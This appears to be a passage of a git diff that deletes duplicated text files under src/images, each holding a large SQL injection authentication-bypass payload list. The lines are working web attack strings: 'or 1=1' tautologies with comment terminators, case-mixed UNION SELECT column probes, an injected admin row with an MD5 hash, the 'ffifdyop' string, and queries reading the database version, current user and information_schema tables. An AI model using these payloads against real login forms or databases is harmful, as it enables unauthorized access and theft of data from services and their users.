-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
